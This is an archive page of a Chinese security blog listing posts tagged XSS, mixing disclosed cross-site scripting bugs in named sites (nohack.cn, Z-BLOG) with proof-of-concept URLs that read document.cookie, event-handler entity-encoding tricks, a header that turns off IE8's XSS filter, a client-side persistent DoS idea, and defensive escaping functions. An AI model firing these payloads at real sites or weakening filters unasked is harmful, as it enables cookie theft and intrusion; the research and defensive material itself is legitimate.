存档

文章标签 ‘xss’

linux filename xss

2010年11月15日 8 条评论

一、关于文件名
大家都知道在 windows 下面文件名是有规则,定义了一些保留的字符,他们分别是:

< (less than)
> (greater than)
: (colon)
" (double quote)
/ (forward slash)
\ (backslash)
| (vertical bar or pipe)
? (question mark)
* (asterisk)

而linux下面是没有对这些大部分字符进行限制的,可以随意定义的,那么,我们就可以将 XSS Pyload 存储在文件名中,如图所示:

我们可以看到可以成功将 xss pyload 存储在文件名当中了。
二、利用攻击 阅读全文…

分类: 网络安全 标签: , ,

条形码XSS

2010年2月25日 5 条评论

只看图,等成功了再说话。

Link:
XSS, SQL Injection and Fuzzing Barcode Cheat Sheet
http://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php

分类: 网络安全 标签:

javascript事件解码引起的问题

2010年1月22日 8 条评论

在javascript 事件中,当参数是经过编码的值,javascript 会将期解码进行执行,如下代码。

<a href=# onmousemove="&#97;&#108;&#101;&#114;&#116;&#40;&#47;&#119;&#111;&#121;&#105;&#103;&#117;&#105;&#47;&#41;">xxx</a>

另外,由于 javascript 支持 函数参数可以是 函数特性,如下代码:

<script>x( alert(1) );</script>

利用两种特性,就可以引发如下的安全问题:

<a href="#" onmousemove="xxx('&#39;+alert(1)+&#39;',44);return false;">woyigui</a>

当 javascript 代码经过编码带入页面,可以利用事件执行时解码的特性对单引号进行闭合,然后利用 函数参数 可以是 函数的特性进行代码。该方法不能直接用于 《script》内,比如如下代码是不能执行的:

<script>
xxx('&#39;+alert(1)+&#39;');
</script>

由于如上问题,在特定应用环境中,处理与解决 DOM 型XSS 的时候,将更具有挑战。解决方法就是在解码后,再次使用 \ 符号对其处理,但是考虑到特殊应用可能有所影响。

分类: 网络安全 标签:

Fuzz客户端存储对象,寻找client ddos

2009年12月22日 1 条评论

  注: 发表在了第四期 Webzine,文中肯定有缺点,或者不好的地方。更多的访问:
  http://secinn.appspot.com/pstzine/read?issue=4

文/woyigui

目录:
一、前言
二、发现漏洞
三、漏洞利用
四、环境影响
五、漏洞原因
六、后记
七、参考

一、前言

  前一段墨西哥同学发现了一个关于http request header过长造成的一个server limit dos,
他那个是对cookie 写入一个超长的数据造成的。那么,我们可以根据此方法形成新的利用方法,Fuzzer http
头部进行攻击。只要造成WEB服务器返回40X 错误就行了。比如,向http的GET 头部信息的URL值设置特殊的符号,
服务器就会返回错误:

  GET /settings.aspx%22 HTTP/1.1   //此处<br />  Host: cn.bing.com<br />  User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.5<br />  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />  Accept-Language: zh-cn,zh;q=0.5<br />  Accept-Encoding: gzip,deflate<br />  Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7<br />  Keep-Alive: 300<br />  Connection: keep-alive<br />  Cookie: _HOP=I=1&TS=1260805184; OVR=flt=0&DomainVertical=omdublin&Cashback=cbtest4&MSCorp=kievfinal&GeoPerf=0&Release=dsf3<br />  Cache-Control: max-age=0

  会引起问题的符号:” <> %
  同样情况,任何http头部字段都可伪造,进行超长、特殊构造,让服务器返回错误。但是,此类的攻击只是单次的,不能引起持久性攻击。就不符合我们本文的目的。
根据http协议看到,用于持久化保存用户状态的一共有4 种方式,分别为:Cookies、Flash Local shared objects、userdata、DOM storage。因为这几
种方法可以持久保存用户的状态,所以在重新打开浏览器的同时,依然可以保持,也就是说假如我们攻击成功,就可以实现持久性的 ddos 攻击了。一般情况,我们大多数
都是利用XSS 漏洞进行 ddos 客户端,所以以下方法我们都使用 Javascript 脚本进行设置各种对象,以实现各类的ddos攻击。

二、发现漏洞   阅读全文…

分类: 网络安全 标签: , , ,

Colse IE 8 Cross-Site Scripting Filter

2009年12月8日 3 条评论

除了用户手工通过IE8 的 Internet 选项,来关闭 XSS 过滤器之外,还可以通过服务器端脚本添加 http 头部信息来关闭XSS功能,当添加如下 http header 以后,XSS filter 将不起作用:
PHP:

header("x-xss-Protection:0");
ASP.net web.config<system.webServer>
    <httpProtocol>
      <customHeaders>
        <clear />
        <add name=" X-XSS-Protection" value="0" />
      </customHeaders>
    </httpProtocol>
</system.webServer>

更多参考:http://msdn.microsoft.com/zh-cn/library/dd565647%28en-us,VS.85%29.aspx

分类: 网络安全 标签:

Advanced Media center remote controls假想

2009年12月4日 1 条评论

   在现有的XSS攻击中,一般目的就是偷取cookie等重要用户信息、实现worm传播等功能等,却没有拿它做更有破坏力的攻击。
   该想法源于139 mail worm,但是在编写过程中只实现了在计算机网络中进行自我传播(这也是目前XSS利用的常见目的。),虽然它自带了接口给手机发短信,但因当时功能不可用,没完善起来。所以,目前来看,只能用于计算机网络中的扩散传播。那么,如果利用XSS worm进行传播,然后利用网站应用发送短信到手机(如果有的话),就可以达到在手机中进行传播的目标,实现计算机网络攻击到手机攻击的转变,当时我是想写一篇叫做”XSS 攻击最大化”的文章,当然,在很多情况,不像139有这样环境的。基本流程是这样的:
   xss Vulnerability — > 计算机中传播 —-> 发送恶意手机短信 —> 用户浏览后触发恶意代码,获取电话薄,隐藏群发短信、拔打电话等操作。
   之所以研究WAP WTAI协议文档,就是为了实现这个想法。在写出 DEMO 的时候,是可以实现打电话、发短信的。但是当出现发送短信、或者拔打号码的时候,必须由用户进行确认,不过当大家把焦点转移到手机应用上面的时候,该应用上面的漏洞也会出现很多的,就可以实现在用户不知情的情况下实现某些操作。
   上面只是计算机与手机进行连接实现攻击,另一方面,随着多媒体家庭的普及,计算机网络已经和家庭无线设备连接起来。近段时间同样了解一些家庭设备无线远程控制的资料,目前来看,国内家庭电子设备还是采用红外线进行发送信号的。因其设备的瓶径,红外发送的距离以及强度,小白大牛给出了如下实现流程:
  

电脑——单片机——无线发射模块——无线接收模块——红外发射——红外接收——单片机——控制电器

   从无线接收模块起,后面的都是在被控端进行布蜀,但这就会违背攻击的意图,被控端部分只能等科技的发展,家庭媒体的网络化再做调整了。如果按这种流程,制作出一款高强度通用控制信号发射器,就可以实现同城所有家电设备远程控制了。在国外,已经有一些高强度小型遥控器,比如:http://www.amazon.com/Logitech-Harmony-Advanced-Universal-Control/dp/B000CS1TLE

使用无线电频率(RF)和红外线(IR)无线信号来提供强大的完全控制您的家庭娱乐系统。凭借高达100英尺的无线范围内,该设备发射无线电指令到一个无线接收器,然后再由红外线接收执行指令。

    我想,随着科技发展,计算机网络终会和无线通讯设备、家庭无线媒体结合。那么到那时候,计算机网络攻击同样会其他的网络攻击结合起来发展起来。另外,本文的想法并不成熟,只是假想,也有可能有牛人早已想到,希望大家可以与我交流。由于近段时间的研究,发现想涉足另一行业是非常坚难的,单片机开发不说,无线协议是一定会的,所以还要慢慢的来。

分类: 网络安全 标签: ,

javascript htmlspecialchars

2009年9月25日 6 条评论

记录:

<script>
   function htmlspecialchars(string){
     var data = [];
     for(var i = 0 ;i <string.length;i++) {
       data.push( "&#"+string.charCodeAt(i)+";");
     }
  return data.join("");
   }
   document.write(htmlspecialchars("@{}<script>javascript alert<\/script>"));
</script>
<script>
function filter (str) {
  str = str.replace(/&/g, '&amp;');
  str = str.replace(/</g, '&lt;');
  str = str.replace(/>/g, '&gt;');
  str = str.replace(/'/g, '&acute;');
  str = str.replace(/"/g, '&quot;');
  str = str.replace(/\|/g, '&brvbar;');
  return str;
}
alert(filter("url"))
</script>
分类: 编程地带 标签: ,

白名单编码防止XSS

2009年8月22日 没有评论

在AntiXSS项目中,各个函数均采用白名单方式进行编码,比如一个 EncodeHtml() Java函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
private static String EncodeHtml(String strInput) {
    if (strInput.length() == 0) {
      return EmptyString;
    }
    StringBuffer builder = new StringBuffer(strInput.length() * 2);
    CharacterIterator it = new StringCharacterIterator(strInput);
    for (char ch = it.first(); ch != CharacterIterator.DONE; ch = it.next()) {
      if ((((ch > '`') && (ch < '{')) || ((ch > '@') && (ch < '[')))
          || (((ch == ' ') || ((ch > '/') && (ch < ':'))) || (((ch == '.') || (ch == ',')) || ((ch == '-') || (ch == '_'))))) {
        builder.append(ch);
      } else {
        builder.append("&#" + (int) ch + ";");
      }
    }
    return builder.toString();
  }

根据ASCII,先排除了正常使用的字符,其他均进行编码。相比其他采用黑名单编码的自写函数要好的多。。

分类: 网络安全 标签: , ,

Nohack XSS

2009年7月31日 4 条评论

link.php页面不是Dz论坛自带的,是nohack自己写的,虽然用 htmlspecialchars 函数进行处理了, php.ini配置里gpc也开了,虽然没办法通过闭合进行xss,但是nohack却忘记了javascript伪协议放在资源请求里面会被执行:

http://www.nohack.cn/bbs/link.php?link=javascript:alert(document.cookie)

页面内容:

<iframe id="url_mainframe" frameborder="0" scrolling="yes" name="main" src="javascript:alert(document.cookie)" style="height: 100%; visibility: inherit; width: 100%; z-index: 1;overflow: visible;"></iframe>

这种方式还是很多呀!!

分类: 网络安全 标签: , ,

Z-BLOG XSS Vulnerabilities

2009年6月12日 3 条评论

漏洞描述:
Z-BLOG后台登陆错误信息显示文件c_error.asp,虽然对跳转URL的参数sourceurl进行了编码,但没有判断链接头部,执行了javascript伪协议,造成跨站脚本漏洞。
漏洞测试:

http://www.woyigui.cn/function/c_error.asp?errorid=7&number=0&description=&source=&sourceurl=javascript:alert(document.cookie)
分类: 网络安全 标签: